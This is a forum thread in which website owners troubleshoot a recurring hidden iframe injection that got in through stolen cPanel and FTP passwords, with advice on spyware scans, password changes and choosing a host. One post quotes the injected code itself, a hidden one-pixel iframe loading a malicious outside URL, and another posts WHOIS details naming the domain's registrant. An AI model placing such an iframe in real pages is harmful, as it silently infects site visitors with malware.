I need some help. Is there not a way to stop someone from inserting an iframe malicious code into my websites. I've changed the ftp/cpanel passwords and somehow the code keeps getting back in. Wouldn't it be easy for someone to write some sort of script that checks your site files for the iframe tag and delete it as soon as it finds it? Or a script that emails the owner as soon as new code is added to a file so you know if something has changed and you didn't do it? There must be a fairly easy fix to this problem. Can anyone help? Thanks!
How does your site behave when the malicious iframe code is inserted into your pages? Did you contact your host about it?
I don't notice any difference. No popups or anything, but who knows if it's dropping a trojan horse or something onto peoples computers. stopbadware says its something about gogo2 malicious code. I'll have to contact my hosting company I guess, but I thought for sure someone would have figured out a stop to this type of thing by now.
This is Gogo2me hidden iframe injection. It silently installs spyware on your site visitors' computers and makes your site blacklisted by Google and Firefox. http://www.UnmaskParasites.com/security-report/?page=www.movieplanets.com Most likely it has to do with compromised ftp passwords stolen from your computer by spyware. Scan your computer for spyware, then change FTP passwords and don't store them inside FTP programs.
I had the same problem. I contacted my hosting company. They said that my hosting cpanel was hacked (source of attack unknown). I have changed all my passwords (cpanel, ftp, email etc.). Most of my sites were infected by the following iframe tag. < i frame src="http://bestlotron[dot]cn/in[dot]cgi?cocacola57" width=1 height=1 style="visibility: hidden"></ifr ame> It was auto-installing some files in .pdf file -------------------------------------------------- I ran virus check on my PC and found a bunch of trojan hdiden in windows/system folder. Now its all clean.
i advice all to use Virtual pc or virtual box while u acces ur cpanel and other ftp programs. and never ever use the virtual pc to access other stuffs. i follow the same way. its hard to follow like. using virtual pc for all ur needs. but its good wen u use only for small stuffs. i use seperate virtual pc computers for my net banking and hosting stuffs
Hey I had about 6 customers with same problem and I developed a script to clean their server. It took place in LT's servers, many people got mad and blamed it on LT because of a hacking that took place while back and all that stuff... Anyways, I'm a system and security administrator, please check sysrenan.com (not done) and let me know if you're interested look forward to talking to you
Your web host is not very good if they cant determine the source of the hack, surely they have logs to check who was logged in and when and what IP address, and the http raw logs to see if a web application exploit was used to gain access. If there are no signs of attack from either of those then the server must be compromised because it doesn't seem that they have secured their server very well they should have internal integrity checkers to make sure no system files are modified etc and notification if anyone logs in via ssh or brute forces anything. If this continues to happen i'd consider moving to a more stable and secure host.
Read my Reply at this: http://forums.digitalpoint.com/showthread.php?p=10930463 Maybe resolved. At this time more server was infected this. Cause rooted
This is the person who owns the domain... Domain Name: bestlotron.cn ROID: 20081108s10001s82359738-cn Domain Status: clientTransferProhibited Registrant Organization: Raymond Keaton Registrant Name: Raymond Keaton Administrative Email: @cybernauttech.com Name Server:ns1.freednshostserver.com Name Server:ns2.freednshostserver.com Registration Date: 2008-11-08 16:07 Expiration Date: 2009-11-08 16:07
I got the same problem with some of my friends - and every time it was when they accessed their website from a "foreign" machine without proper antivirus software installed. My solution to that is to keep my antivirus base up-to-date.. I think, trying to determine the source will not help much, there are thousands of viruses and hacking methods. As this time it was a cpanel hack, i would consider changing the hosting company. Hosts with quality services usually detect and maybe even solve such problems much faster, than you may notice.. A script will not help you, imo, it's the responsibility of the host to prevent such happenings..
what good will that do if the host OS is infected and sniffing ftp passwords? The guest OS in Virtual PC/VMWare will still send them in clear text and you host OS will route the information, giving the virus access to it.